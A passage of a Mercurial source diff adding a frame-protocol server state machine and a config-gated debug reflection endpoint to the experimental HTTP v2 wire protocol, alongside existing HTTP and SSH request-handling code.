138 185 flags = FLAG_COMMAND_ARGUMENT_EOA if last else 0
139 186 yield makeframe(FRAME_TYPE_COMMAND_ARGUMENT, flags, payload)
140 187
141 188 if datafh:
142 189 while True:
143 190 data = datafh.read(DEFAULT_MAX_FRAME_SIZE)
144 191
145 192 done = False
146 193 if len(data) == DEFAULT_MAX_FRAME_SIZE:
147 194 flags = FLAG_COMMAND_DATA_CONTINUATION
148 195 else:
149 196 flags = FLAG_COMMAND_DATA_EOS
150 197 assert datafh.read(1) == b''
151 198 done = True
152 199
153 200 yield makeframe(FRAME_TYPE_COMMAND_DATA, flags, data)
154 201
155 202 if done:
156 203 break
204
205 class serverreactor(object):
206 """Holds state of a server handling frame-based protocol requests.
207
208 This class is the "brain" of the unified frame-based protocol server
209 component. While the protocol is stateless from the perspective of
210 requests/commands, something needs to track which frames have been
211 received, what frames to expect, etc. This class is that thing.
212
213 Instances are modeled as a state machine of sorts. Instances are also
214 reactionary to external events. The point of this class is to encapsulate
215 the state of the connection and the exchange of frames, not to perform
216 work. Instead, callers tell this class when something occurs, like a
217 frame arriving. If that activity is worthy of a follow-up action (say
218 *run a command*), the return value of that handler will say so.
219
220 I/O and CPU intensive operations are purposefully delegated outside of
221 this class.
222
223 Consumers are expected to tell instances when events occur. They do so by
224 calling the various ``on*`` methods. These methods return a 2-tuple
225 describing any follow-up action(s) to take. The first element is the
226 name of an action to perform. The second is a data structure (usually
227 a dict) specific to that action that contains more information. e.g.
228 if the server wants to send frames back to the client, the data structure
229 will contain a reference to those frames.
230
231 Valid actions that consumers can be instructed to take are:
232
233 error
234 Indicates that an error occurred. Consumer should probably abort.
235
236 runcommand
237 Indicates that the consumer should run a wire protocol command. Details
238 of the command to run are given in the data structure.
239
240 wantframe
241 Indicates that nothing of interest happened and the server is waiting on
242 more frames from the client before anything interesting can be done.
243 """
244
245 def __init__(self):
246 self._state = 'idle'
247 self._activecommand = None
248 self._activeargs = None
249 self._activedata = None
250 self._expectingargs = None
251 self._expectingdata = None
252 self._activeargname = None
253 self._activeargchunks = None
254
255 def onframerecv(self, frametype, frameflags, payload):
256 """Process a frame that has been received off the wire.
257
258 Returns a dict with an ``action`` key that details what action,
259 if any, the consumer should take next.
260 """
261 handlers = {
262 'idle': self._onframeidle,
263 'command-receiving-args': self._onframereceivingargs,
264 'command-receiving-data': self._onframereceivingdata,
265 'errored': self._onframeerrored,
266 }
267
268 meth = handlers.get(self._state)
269 if not meth:
270 raise error.ProgrammingError('unhandled state: %s' % self._state)
271
272 return meth(frametype, frameflags, payload)
273
274 def _makeerrorresult(self, msg):
275 return 'error', {
276 'message': msg,
277 }
278
279 def _makeruncommandresult(self):
280 return 'runcommand', {
281 'command': self._activecommand,
282 'args': self._activeargs,
283 'data': self._activedata.getvalue() if self._activedata else None,
284 }
285
286 def _makewantframeresult(self):
287 return 'wantframe', {
288 'state': self._state,
289 }
290
291 def _onframeidle(self, frametype, frameflags, payload):
292 # The only frame type that should be received in this state is a
293 # command request.
294 if frametype != FRAME_TYPE_COMMAND_NAME:
295 self._state = 'errored'
296 return self._makeerrorresult(
297 _('expected command frame; got %d') % frametype)
298
299 self._activecommand = payload
300 self._activeargs = {}
301 self._activedata = None
302
303 if frameflags & FLAG_COMMAND_NAME_EOS:
304 return self._makeruncommandresult()
305
306 self._expectingargs = bool(frameflags & FLAG_COMMAND_NAME_HAVE_ARGS)
307 self._expectingdata = bool(frameflags & FLAG_COMMAND_NAME_HAVE_DATA)
308
309 if self._expectingargs:
310 self._state = 'command-receiving-args'
311 return self._makewantframeresult()
312 elif self._expectingdata:
313 self._activedata = util.bytesio()
314 self._state = 'command-receiving-data'
315 return self._makewantframeresult()
316 else:
317 self._state = 'errored'
318 return self._makeerrorresult(_('missing frame flags on '
319 'command frame'))
320
321 def _onframereceivingargs(self, frametype, frameflags, payload):
322 if frametype != FRAME_TYPE_COMMAND_ARGUMENT:
323 self._state = 'errored'
324 return self._makeerrorresult(_('expected command argument '
325 'frame; got %d') % frametype)
326
327 offset = 0
328 namesize, valuesize = ARGUMENT_FRAME_HEADER.unpack_from(payload)
329 offset += ARGUMENT_FRAME_HEADER.size
330
331 # The argument name MUST fit inside the frame.
332 argname = bytes(payload[offset:offset + namesize])
333 offset += namesize
334
335 if len(argname) != namesize:
336 self._state = 'errored'
337 return self._makeerrorresult(_('malformed argument frame: '
338 'partial argument name'))
339
340 argvalue = bytes(payload[offset:])
341
342 # Argument value spans multiple frames. Record our active state
343 # and wait for the next frame.
344 if frameflags & FLAG_COMMAND_ARGUMENT_CONTINUATION:
345 raise error.ProgrammingError('not yet implemented')
346 self._activeargname = argname
347 self._activeargchunks = [argvalue]
348 self._state = 'command-arg-continuation'
349 return self._makewantframeresult()
350
351 # Common case: the argument value is completely contained in this
352 # frame.
353
354 if len(argvalue) != valuesize:
355 self._state = 'errored'
356 return self._makeerrorresult(_('malformed argument frame: '
357 'partial argument value'))
358
359 self._activeargs[argname] = argvalue
360
361 if frameflags & FLAG_COMMAND_ARGUMENT_EOA:
362 if self._expectingdata:
363 self._state = 'command-receiving-data'
364 self._activedata = util.bytesio()
365 # TODO signal request to run a command once we don't
366 # buffer data frames.
367 return self._makewantframeresult()
368 else:
369 self._state = 'waiting'
370 return self._makeruncommandresult()
371 else:
372 return self._makewantframeresult()
373
374 def _onframereceivingdata(self, frametype, frameflags, payload):
375 if frametype != FRAME_TYPE_COMMAND_DATA:
376 self._state = 'errored'
377 return self._makeerrorresult(_('expected command data frame; '
378 'got %d') % frametype)
379
380 # TODO support streaming data instead of buffering it.
381 self._activedata.write(payload)
382
383 if frameflags & FLAG_COMMAND_DATA_CONTINUATION:
384 return self._makewantframeresult()
385 elif frameflags & FLAG_COMMAND_DATA_EOS:
386 self._activedata.seek(0)
387 self._state = 'idle'
388 return self._makeruncommandresult()
389 else:
390 self._state = 'errored'
391 return self._makeerrorresult(_('command data frame without '
392 'flags'))
393
394 def _onframeerrored(self, frametype, frameflags, payload):
395 return self._makeerrorresult(_('server already errored'))
@@ -1,833 +1,881 b''
1 1 # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
2 2 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
3 3 #
4 4 # This software may be used and distributed according to the terms of the
5 5 # GNU General Public License version 2 or any later version.
6 6
7 7 from __future__ import absolute_import
8 8
9 9 import contextlib
10 10 import struct
11 11 import sys
12 12 import threading
13 13
14 14 from .i18n import _
15 15 from . import (
16 16 encoding,
17 17 error,
18 18 hook,
19 19 pycompat,
20 20 util,
21 21 wireproto,
22 wireprotoframing,
22 23 wireprototypes,
23 24 )
24 25
25 26 stringio = util.stringio
26 27
27 28 urlerr = util.urlerr
28 29 urlreq = util.urlreq
29 30
30 31 HTTP_OK = 200
31 32
32 33 HGTYPE = 'application/mercurial-0.1'
33 34 HGTYPE2 = 'application/mercurial-0.2'
34 35 HGERRTYPE = 'application/hg-error'
35 36 FRAMINGTYPE = b'application/mercurial-exp-framing-0001'
36 37
37 38 HTTPV2 = wireprototypes.HTTPV2
38 39 SSHV1 = wireprototypes.SSHV1
39 40 SSHV2 = wireprototypes.SSHV2
40 41
41 42 def decodevaluefromheaders(req, headerprefix):
42 43 """Decode a long value from multiple HTTP request headers.
43 44
44 45 Returns the value as a bytes, not a str.
45 46 """
46 47 chunks = []
47 48 i = 1
48 49 while True:
49 50 v = req.headers.get(b'%s-%d' % (headerprefix, i))
50 51 if v is None:
51 52 break
52 53 chunks.append(pycompat.bytesurl(v))
53 54 i += 1
54 55
55 56 return ''.join(chunks)
56 57
57 58 class httpv1protocolhandler(wireprototypes.baseprotocolhandler):
58 59 def __init__(self, req, ui, checkperm):
59 60 self._req = req
60 61 self._ui = ui
61 62 self._checkperm = checkperm
62 63
63 64 @property
64 65 def name(self):
65 66 return 'http-v1'
66 67
67 68 def getargs(self, args):
68 69 knownargs = self._args()
69 70 data = {}
70 71 keys = args.split()
71 72 for k in keys:
72 73 if k == '*':
73 74 star = {}
74 75 for key in knownargs.keys():
75 76 if key != 'cmd' and key not in keys:
76 77 star[key] = knownargs[key][0]
77 78 data['*'] = star
78 79 else:
79 80 data[k] = knownargs[k][0]
80 81 return [data[k] for k in keys]
81 82
82 83 def _args(self):
83 84 args = self._req.qsparams.asdictoflists()
84 85 postlen = int(self._req.headers.get(b'X-HgArgs-Post', 0))
85 86 if postlen:
86 87 args.update(urlreq.parseqs(
87 88 self._req.bodyfh.read(postlen), keep_blank_values=True))
88 89 return args
89 90
90 91 argvalue = decodevaluefromheaders(self._req, b'X-HgArg')
91 92 args.update(urlreq.parseqs(argvalue, keep_blank_values=True))
92 93 return args
93 94
94 95 def forwardpayload(self, fp):
95 96 # Existing clients *always* send Content-Length.
96 97 length = int(self._req.headers[b'Content-Length'])
97 98
98 99 # If httppostargs is used, we need to read Content-Length
99 100 # minus the amount that was consumed by args.
100 101 length -= int(self._req.headers.get(b'X-HgArgs-Post', 0))
101 102 for s in util.filechunkiter(self._req.bodyfh, limit=length):
102 103 fp.write(s)
103 104
104 105 @contextlib.contextmanager
105 106 def mayberedirectstdio(self):
106 107 oldout = self._ui.fout
107 108 olderr = self._ui.ferr
108 109
109 110 out = util.stringio()
110 111
111 112 try:
112 113 self._ui.fout = out
113 114 self._ui.ferr = out
114 115 yield out
115 116 finally:
116 117 self._ui.fout = oldout
117 118 self._ui.ferr = olderr
118 119
119 120 def client(self):
120 121 return 'remote:%s:%s:%s' % (
121 122 self._req.urlscheme,
122 123 urlreq.quote(self._req.remotehost or ''),
123 124 urlreq.quote(self._req.remoteuser or ''))
124 125
125 126 def addcapabilities(self, repo, caps):
126 127 caps.append('httpheader=%d' %
127 128 repo.ui.configint('server', 'maxhttpheaderlen'))
128 129 if repo.ui.configbool('experimental', 'httppostargs'):
129 130 caps.append('httppostargs')
130 131
131 132 # FUTURE advertise 0.2rx once support is implemented
132 133 # FUTURE advertise minrx and mintx after consulting config option
133 134 caps.append('httpmediatype=0.1rx,0.1tx,0.2tx')
134 135
135 136 compengines = wireproto.supportedcompengines(repo.ui, util.SERVERROLE)
136 137 if compengines:
137 138 comptypes = ','.join(urlreq.quote(e.wireprotosupport().name)
138 139 for e in compengines)
139 140 caps.append('compression=%s' % comptypes)
140 141
141 142 return caps
142 143
143 144 def checkperm(self, perm):
144 145 return self._checkperm(perm)
145 146
146 147 # This method exists mostly so that extensions like remotefilelog can
147 148 # disable a kludgey legacy method only over http. As of early 2018,
148 149 # there are no other known users, so with any luck we can discard this
149 150 # hook if remotefilelog becomes a first-party extension.
150 151 def iscmd(cmd):
151 152 return cmd in wireproto.commands
152 153
153 154 def handlewsgirequest(rctx, req, res, checkperm):
154 155 """Possibly process a wire protocol request.
155 156
156 157 If the current request is a wire protocol request, the request is
157 158 processed by this function.
158 159
159 160 ``req`` is a ``parsedrequest`` instance.
160 161 ``res`` is a ``wsgiresponse`` instance.
161 162
162 163 Returns a bool indicating if the request was serviced. If set, the caller
163 164 should stop processing the request, as a response has already been issued.
164 165 """
165 166 # Avoid cycle involving hg module.
166 167 from .hgweb import common as hgwebcommon
167 168
168 169 repo = rctx.repo
169 170
170 171 # HTTP version 1 wire protocol requests are denoted by a "cmd" query
171 172 # string parameter. If it isn't present, this isn't a wire protocol
172 173 # request.
173 174 if 'cmd' not in req.qsparams:
174 175 return False
175 176
176 177 cmd = req.qsparams['cmd']
177 178
178 179 # The "cmd" request parameter is used by both the wire protocol and hgweb.
179 180 # While not all wire protocol commands are available for all transports,
180 181 # if we see a "cmd" value that resembles a known wire protocol command, we
181 182 # route it to a protocol handler. This is better than routing possible
182 183 # wire protocol requests to hgweb because it prevents hgweb from using
183 184 # known wire protocol commands and it is less confusing for machine
184 185 # clients.
185 186 if not iscmd(cmd):
186 187 return False
187 188
188 189 # The "cmd" query string argument is only valid on the root path of the
189 190 # repo. e.g. ``/?cmd=foo``, ``/repo?cmd=foo``. URL paths within the repo
190 191 # like ``/blah?cmd=foo`` are not allowed. So don't recognize the request
191 192 # in this case. We send an HTTP 404 for backwards compatibility reasons.
192 193 if req.dispatchpath:
193 194 res.status = hgwebcommon.statusmessage(404)
194 195 res.headers['Content-Type'] = HGTYPE
195 196 # TODO This is not a good response to issue for this request. This
196 197 # is mostly for BC for now.
197 198 res.setbodybytes('0\n%s\n' % b'Not Found')
198 199 return True
199 200
200 201 proto = httpv1protocolhandler(req, repo.ui,
201 202 lambda perm: checkperm(rctx, req, perm))
202 203
203 204 # The permissions checker should be the only thing that can raise an
204 205 # ErrorResponse. It is kind of a layer violation to catch an hgweb
205 206 # exception here. So consider refactoring into a exception type that
206 207 # is associated with the wire protocol.
207 208 try:
208 209 _callhttp(repo, req, res, proto, cmd)
209 210 except hgwebcommon.ErrorResponse as e:
210 211 for k, v in e.headers:
211 212 res.headers[k] = v
212 213 res.status = hgwebcommon.statusmessage(e.code, pycompat.bytestr(e))
213 214 # TODO This response body assumes the failed command was
214 215 # "unbundle." That assumption is not always valid.
215 216 res.setbodybytes('0\n%s\n' % pycompat.bytestr(e))
216 217
217 218 return True
218 219
219 220 def handlewsgiapirequest(rctx, req, res, checkperm):
220 221 """Handle requests to /api/*."""
221 222 assert req.dispatchparts[0] == b'api'
222 223
223 224 repo = rctx.repo
224 225
225 226 # This whole URL space is experimental for now. But we want to
226 227 # reserve the URL space. So, 404 all URLs if the feature isn't enabled.
227 228 if not repo.ui.configbool('experimental', 'web.apiserver'):
228 229 res.status = b'404 Not Found'
229 230 res.headers[b'Content-Type'] = b'text/plain'
230 231 res.setbodybytes(_('Experimental API server endpoint not enabled'))
231 232 return
232 233
233 234 # The URL space is /api/<protocol>/*. The structure of URLs under varies
234 235 # by <protocol>.
235 236
236 237 # Registered APIs are made available via config options of the name of
237 238 # the protocol.
238 239 availableapis = set()
239 240 for k, v in API_HANDLERS.items():
240 241 section, option = v['config']
241 242 if repo.ui.configbool(section, option):
242 243 availableapis.add(k)
243 244
244 245 # Requests to /api/ list available APIs.
245 246 if req.dispatchparts == [b'api']:
246 247 res.status = b'200 OK'
247 248 res.headers[b'Content-Type'] = b'text/plain'
248 249 lines = [_('APIs can be accessed at /api/<name>, where <name> can be '
249 250 'one of the following:\n')]
250 251 if availableapis:
251 252 lines.extend(sorted(availableapis))
252 253 else:
253 254 lines.append(_('(no available APIs)\n'))
254 255 res.setbodybytes(b'\n'.join(lines))
255 256 return
256 257
257 258 proto = req.dispatchparts[1]
258 259
259 260 if proto not in API_HANDLERS:
260 261 res.status = b'404 Not Found'
261 262 res.headers[b'Content-Type'] = b'text/plain'
262 263 res.setbodybytes(_('Unknown API: %s\nKnown APIs: %s') % (
263 264 proto, b', '.join(sorted(availableapis))))
264 265 return
265 266
266 267 if proto not in availableapis:
267 268 res.status = b'404 Not Found'
268 269 res.headers[b'Content-Type'] = b'text/plain'
269 270 res.setbodybytes(_('API %s not enabled\n') % proto)
270 271 return
271 272
272 273 API_HANDLERS[proto]['handler'](rctx, req, res, checkperm,
273 274 req.dispatchparts[2:])
274 275
275 276 def _handlehttpv2request(rctx, req, res, checkperm, urlparts):
276 277 from .hgweb import common as hgwebcommon
277 278
278 279 # URL space looks like: <permissions>/<command>, where <permission> can
279 280 # be ``ro`` or ``rw`` to signal read-only or read-write, respectively.
280 281
281 282 # Root URL does nothing meaningful... yet.
282 283 if not urlparts:
283 284 res.status = b'200 OK'
284 285 res.headers[b'Content-Type'] = b'text/plain'
285 286 res.setbodybytes(_('HTTP version 2 API handler'))
286 287 return
287 288
288 289 if len(urlparts) == 1:
289 290 res.status = b'404 Not Found'
290 291 res.headers[b'Content-Type'] = b'text/plain'
291 292 res.setbodybytes(_('do not know how to process %s\n') %
292 293 req.dispatchpath)
293 294 return
294 295
295 296 permission, command = urlparts[0:2]
296 297
297 298 if permission not in (b'ro', b'rw'):
298 299 res.status = b'404 Not Found'
299 300 res.headers[b'Content-Type'] = b'text/plain'
300 301 res.setbodybytes(_('unknown permission: %s') % permission)
301 302 return
302 303
303 304 if req.method != 'POST':
304 305 res.status = b'405 Method Not Allowed'
305 306 res.headers[b'Allow'] = b'POST'
306 307 res.setbodybytes(_('commands require POST requests'))
307 308 return
308 309
309 310 # At some point we'll want to use our own API instead of recycling the
310 311 # behavior of version 1 of the wire protocol...
311 312 # TODO return reasonable responses - not responses that overload the
312 313 # HTTP status line message for error reporting.
313 314 try:
314 315 checkperm(rctx, req, 'pull' if permission == b'ro' else 'push')
315 316 except hgwebcommon.ErrorResponse as e:
316 317 res.status = hgwebcommon.statusmessage(e.code, pycompat.bytestr(e))
317 318 for k, v in e.headers:
318 319 res.headers[k] = v
319 320 res.setbodybytes('permission denied')
320 321 return
321 322
323 # We have a special endpoint to reflect the request back at the client.
324 if command == b'debugreflect':
325 _processhttpv2reflectrequest(rctx.repo.ui, rctx.repo, req, res)
326 return
327
322 328 if command not in wireproto.commands:
323 329 res.status = b'404 Not Found'
324 330 res.headers[b'Content-Type'] = b'text/plain'
325 331 res.setbodybytes(_('unknown wire protocol command: %s\n') % command)
326 332 return
327 333
328 334 repo = rctx.repo
329 335 ui = repo.ui
330 336
331 337 proto = httpv2protocolhandler(req, ui)
332 338
333 339 if not wireproto.commands.commandavailable(command, proto):
334 340 res.status = b'404 Not Found'
335 341 res.headers[b'Content-Type'] = b'text/plain'
336 342 res.setbodybytes(_('invalid wire protocol command: %s') % command)
337 343 return
338 344
339 345 if req.headers.get(b'Accept') != FRAMINGTYPE:
340 346 res.status = b'406 Not Acceptable'
341 347 res.headers[b'Content-Type'] = b'text/plain'
342 348 res.setbodybytes(_('client MUST specify Accept header with value: %s\n')
343 349 % FRAMINGTYPE)
344 350 return
345 351
346 if (b'Content-Type' in req.headers
347 and req.headers[b'Content-Type'] != FRAMINGTYPE):
352 if req.headers.get(b'Content-Type') != FRAMINGTYPE:
348 353 res.status = b'415 Unsupported Media Type'
349 354 # TODO we should send a response with appropriate media type,
350 355 # since client does Accept it.
351 356 res.headers[b'Content-Type'] = b'text/plain'
352 357 res.setbodybytes(_('client MUST send Content-Type header with '
353 358 'value: %s\n') % FRAMINGTYPE)
354 359 return
355 360
356 361 # We don't do anything meaningful yet.
357 362 res.status = b'200 OK'
358 363 res.headers[b'Content-Type'] = b'text/plain'
359 364 res.setbodybytes(b'/'.join(urlparts) + b'\n')
360 365
366 def _processhttpv2reflectrequest(ui, repo, req, res):
367 """Reads unified frame protocol request and dumps out state to client.
368
369 This special endpoint can be used to help debug the wire protocol.
370
371 Instead of routing the request through the normal dispatch mechanism,
372 we instead read all frames, decode them, and feed them into our state
373 tracker. We then dump the log of all that activity back out to the
374 client.
375 """
376 import json
377
378 # Reflection APIs have a history of being abused, accidentally disclosing
379 # sensitive data, etc. So we have a config knob.
380 if not ui.configbool('experimental', 'web.api.debugreflect'):
381 res.status = b'404 Not Found'
382 res.headers[b'Content-Type'] = b'text/plain'
383 res.setbodybytes(_('debugreflect service not available'))
384 return
385
386 # We assume we have a unified framing protocol request body.
387
388 reactor = wireprotoframing.serverreactor()
389 states = []
390
391 while True:
392 frame = wireprotoframing.readframe(req.bodyfh)
393
394 if not frame:
395 states.append(b'received: <no frame>')
396 break
397
398 frametype, frameflags, payload = frame
399 states.append(b'received: %d %d %s' % (frametype, frameflags, payload))
400
401 action, meta = reactor.onframerecv(frametype, frameflags, payload)
402 states.append(json.dumps((action, meta), sort_keys=True,
403 separators=(', ', ': ')))
404
405 res.status = b'200 OK'
406 res.headers[b'Content-Type'] = b'text/plain'
407 res.setbodybytes(b'\n'.join(states))
408
361 409 # Maps API name to metadata so custom API can be registered.
362 410 API_HANDLERS = {
363 411 HTTPV2: {
364 412 'config': ('experimental', 'web.api.http-v2'),
365 413 'handler': _handlehttpv2request,
366 414 },
367 415 }
368 416
369 417 class httpv2protocolhandler(wireprototypes.baseprotocolhandler):
370 418 def __init__(self, req, ui):
371 419 self._req = req
372 420 self._ui = ui
373 421
374 422 @property
375 423 def name(self):
376 424 return HTTPV2
377 425
378 426 def getargs(self, args):
379 427 raise NotImplementedError
380 428
381 429 def forwardpayload(self, fp):
382 430 raise NotImplementedError
383 431
384 432 @contextlib.contextmanager
385 433 def mayberedirectstdio(self):
386 434 raise NotImplementedError
387 435
388 436 def client(self):
389 437 raise NotImplementedError
390 438
391 439 def addcapabilities(self, repo, caps):
392 440 raise NotImplementedError
393 441
394 442 def checkperm(self, perm):
395 443 raise NotImplementedError
396 444
397 445 def _httpresponsetype(ui, req, prefer_uncompressed):
398 446 """Determine the appropriate response type and compression settings.
399 447
400 448 Returns a tuple of (mediatype, compengine, engineopts).
401 449 """
402 450 # Determine the response media type and compression engine based
403 451 # on the request parameters.
404 452 protocaps = decodevaluefromheaders(req, 'X-HgProto').split(' ')
405 453
406 454 if '0.2' in protocaps:
407 455 # All clients are expected to support uncompressed data.
408 456 if prefer_uncompressed:
409 457 return HGTYPE2, util._noopengine(), {}
410 458
411 459 # Default as defined by wire protocol spec.
412 460 compformats = ['zlib', 'none']
413 461 for cap in protocaps:
414 462 if cap.startswith('comp='):
415 463 compformats = cap[5:].split(',')
416 464 break
417 465
418 466 # Now find an agreed upon compression format.
419 467 for engine in wireproto.supportedcompengines(ui, util.SERVERROLE):
420 468 if engine.wireprotosupport().name in compformats:
421 469 opts = {}
422 470 level = ui.configint('server', '%slevel' % engine.name())
423 471 if level is not None:
424 472 opts['level'] = level
425 473
426 474 return HGTYPE2, engine, opts
427 475
428 476 # No mutually supported compression format. Fall back to the
429 477 # legacy protocol.
430 478
431 479 # Don't allow untrusted settings because disabling compression or
432 480 # setting a very high compression level could lead to flooding
433 481 # the server's network or CPU.
434 482 opts = {'level': ui.configint('server', 'zliblevel')}
435 483 return HGTYPE, util.compengines['zlib'], opts
436 484
437 485 def _callhttp(repo, req, res, proto, cmd):
438 486 # Avoid cycle involving hg module.
439 487 from .hgweb import common as hgwebcommon
440 488
441 489 def genversion2(gen, engine, engineopts):
442 490 # application/mercurial-0.2 always sends a payload header
443 491 # identifying the compression engine.
444 492 name = engine.wireprotosupport().name
445 493 assert 0 < len(name) < 256
446 494 yield struct.pack('B', len(name))
447 495 yield name
448 496
449 497 for chunk in gen:
450 498 yield chunk
451 499
452 500 def setresponse(code, contenttype, bodybytes=None, bodygen=None):
453 501 if code == HTTP_OK:
454 502 res.status = '200 Script output follows'
455 503 else:
456 504 res.status = hgwebcommon.statusmessage(code)
457 505
458 506 res.headers['Content-Type'] = contenttype
459 507
460 508 if bodybytes is not None:
461 509 res.setbodybytes(bodybytes)
462 510 if bodygen is not None:
463 511 res.setbodygen(bodygen)
464 512
465 513 if not wireproto.commands.commandavailable(cmd, proto):
466 514 setresponse(HTTP_OK, HGERRTYPE,
467 515 _('requested wire protocol command is not available over '
468 516 'HTTP'))
469 517 return
470 518
471 519 proto.checkperm(wireproto.commands[cmd].permission)
472 520
473 521 rsp = wireproto.dispatch(repo, proto, cmd)
474 522
475 523 if isinstance(rsp, bytes):
476 524 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp)
477 525 elif isinstance(rsp, wireprototypes.bytesresponse):
478 526 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp.data)
479 527 elif isinstance(rsp, wireprototypes.streamreslegacy):
480 528 setresponse(HTTP_OK, HGTYPE, bodygen=rsp.gen)
481 529 elif isinstance(rsp, wireprototypes.streamres):
482 530 gen = rsp.gen
483 531
484 532 # This code for compression should not be streamres specific. It
485 533 # is here because we only compress streamres at the moment.
486 534 mediatype, engine, engineopts = _httpresponsetype(
487 535 repo.ui, req, rsp.prefer_uncompressed)
488 536 gen = engine.compressstream(gen, engineopts)
489 537
490 538 if mediatype == HGTYPE2:
491 539 gen = genversion2(gen, engine, engineopts)
492 540
493 541 setresponse(HTTP_OK, mediatype, bodygen=gen)
494 542 elif isinstance(rsp, wireprototypes.pushres):
495 543 rsp = '%d\n%s' % (rsp.res, rsp.output)
496 544 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp)
497 545 elif isinstance(rsp, wireprototypes.pusherr):
498 546 rsp = '0\n%s\n' % rsp.res
499 547 res.drain = True
500 548 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp)
501 549 elif isinstance(rsp, wireprototypes.ooberror):
502 550 setresponse(HTTP_OK, HGERRTYPE, bodybytes=rsp.message)
503 551 else:
504 552 raise error.ProgrammingError('hgweb.protocol internal failure', rsp)
505 553
506 554 def _sshv1respondbytes(fout, value):
507 555 """Send a bytes response for protocol version 1."""
508 556 fout.write('%d\n' % len(value))
509 557 fout.write(value)
510 558 fout.flush()
511 559
512 560 def _sshv1respondstream(fout, source):
513 561 write = fout.write
514 562 for chunk in source.gen:
515 563 write(chunk)
516 564 fout.flush()
517 565
518 566 def _sshv1respondooberror(fout, ferr, rsp):
519 567 ferr.write(b'%s\n-\n' % rsp)
520 568 ferr.flush()
521 569 fout.write(b'\n')
522 570 fout.flush()
523 571
524 572 class sshv1protocolhandler(wireprototypes.baseprotocolhandler):
525 573 """Handler for requests services via version 1 of SSH protocol."""
526 574 def __init__(self, ui, fin, fout):
527 575 self._ui = ui
528 576 self._fin = fin
529 577 self._fout = fout
530 578
531 579 @property
532 580 def name(self):
533 581 return wireprototypes.SSHV1
534 582
535 583 def getargs(self, args):
536 584 data = {}
537 585 keys = args.split()
538 586 for n in xrange(len(keys)):
539 587 argline = self._fin.readline()[:-1]
540 588 arg, l = argline.split()
541 589 if arg not in keys:
542 590 raise error.Abort(_("unexpected parameter %r") % arg)
543 591 if arg == '*':
544 592 star = {}
545 593 for k in xrange(int(l)):
546 594 argline = self._fin.readline()[:-1]
547 595 arg, l = argline.split()
548 596 val = self._fin.read(int(l))
549 597 star[arg] = val
550 598 data['*'] = star
551 599 else:
552 600 val = self._fin.read(int(l))
553 601 data[arg] = val
554 602 return [data[k] for k in keys]
555 603
556 604 def forwardpayload(self, fpout):
557 605 # We initially send an empty response. This tells the client it is
558 606 # OK to start sending data. If a client sees any other response, it
559 607 # interprets it as an error.
560 608 _sshv1respondbytes(self._fout, b'')
561 609
562 610 # The file is in the form:
563 611 #
564 612 # <chunk size>\n<chunk>
565 613 # ...
566 614 # 0\n
567 615 count = int(self._fin.readline())
568 616 while count:
569 617 fpout.write(self._fin.read(count))
570 618 count = int(self._fin.readline())
571 619
572 620 @contextlib.contextmanager
573 621 def mayberedirectstdio(self):
574 622 yield None
575 623
576 624 def client(self):
577 625 client = encoding.environ.get('SSH_CLIENT', '').split(' ', 1)[0]
578 626 return 'remote:ssh:' + client
579 627
580 628 def addcapabilities(self, repo, caps):
581 629 return caps
582 630
583 631 def checkperm(self, perm):
584 632 pass
585 633
586 634 class sshv2protocolhandler(sshv1protocolhandler):
587 635 """Protocol handler for version 2 of the SSH protocol."""
588 636
589 637 @property
590 638 def name(self):
591 639 return wireprototypes.SSHV2
592 640
593 641 def _runsshserver(ui, repo, fin, fout, ev):
594 642 # This function operates like a state machine of sorts. The following
595 643 # states are defined:
596 644 #
597 645 # protov1-serving
598 646 # Server is in protocol version 1 serving mode. Commands arrive on
599 647 # new lines. These commands are processed in this state, one command
600 648 # after the other.
601 649 #
602 650 # protov2-serving
603 651 # Server is in protocol version 2 serving mode.
604 652 #
605 653 # upgrade-initial
606 654 # The server is going to process an upgrade request.
607 655 #
608 656 # upgrade-v2-filter-legacy-handshake
609 657 # The protocol is being upgraded to version 2. The server is expecting
610 658 # the legacy handshake from version 1.
611 659 #
612 660 # upgrade-v2-finish
613 661 # The upgrade to version 2 of the protocol is imminent.
614 662 #
615 663 # shutdown
616 664 # The server is shutting down, possibly in reaction to a client event.
617 665 #
618 666 # And here are their transitions:
619 667 #
620 668 # protov1-serving -> shutdown
621 669 # When server receives an empty request or encounters another
622 670 # error.
623 671 #
624 672 # protov1-serving -> upgrade-initial
625 673 # An upgrade request line was seen.
626 674 #
627 675 # upgrade-initial -> upgrade-v2-filter-legacy-handshake
628 676 # Upgrade to version 2 in progress. Server is expecting to
629 677 # process a legacy handshake.
630 678 #
631 679 # upgrade-v2-filter-legacy-handshake -> shutdown
632 680 # Client did not fulfill upgrade handshake requirements.
633 681 #
634 682 # upgrade-v2-filter-legacy-handshake -> upgrade-v2-finish
635 683 # Client fulfilled version 2 upgrade requirements. Finishing that
636 684 # upgrade.
637 685 #
638 686 # upgrade-v2-finish -> protov2-serving
639 687 # Protocol upgrade to version 2 complete. Server can now speak protocol
640 688 # version 2.
641 689 #
642 690 # protov2-serving -> protov1-serving
643 691 # Ths happens by default since protocol version 2 is the same as
644 692 # version 1 except for the handshake.
645 693
646 694 state = 'protov1-serving'
647 695 proto = sshv1protocolhandler(ui, fin, fout)
648 696 protoswitched = False
649 697
650 698 while not ev.is_set():
651 699 if state == 'protov1-serving':
652 700 # Commands are issued on new lines.
653 701 request = fin.readline()[:-1]
654 702
655 703 # Empty lines signal to terminate the connection.
656 704 if not request:
657 705 state = 'shutdown'
658 706 continue
659 707
660 708 # It looks like a protocol upgrade request. Transition state to
661 709 # handle it.
662 710 if request.startswith(b'upgrade '):
663 711 if protoswitched:
664 712 _sshv1respondooberror(fout, ui.ferr,
665 713 b'cannot upgrade protocols multiple '
666 714 b'times')
667 715 state = 'shutdown'
668 716 continue
669 717
670 718 state = 'upgrade-initial'
671 719 continue
672 720
673 721 available = wireproto.commands.commandavailable(request, proto)
674 722
675 723 # This command isn't available. Send an empty response and go
676 724 # back to waiting for a new command.
677 725 if not available:
678 726 _sshv1respondbytes(fout, b'')
679 727 continue
680 728
681 729 rsp = wireproto.dispatch(repo, proto, request)
682 730
683 731 if isinstance(rsp, bytes):
684 732 _sshv1respondbytes(fout, rsp)
685 733 elif isinstance(rsp, wireprototypes.bytesresponse):
686 734 _sshv1respondbytes(fout, rsp.data)
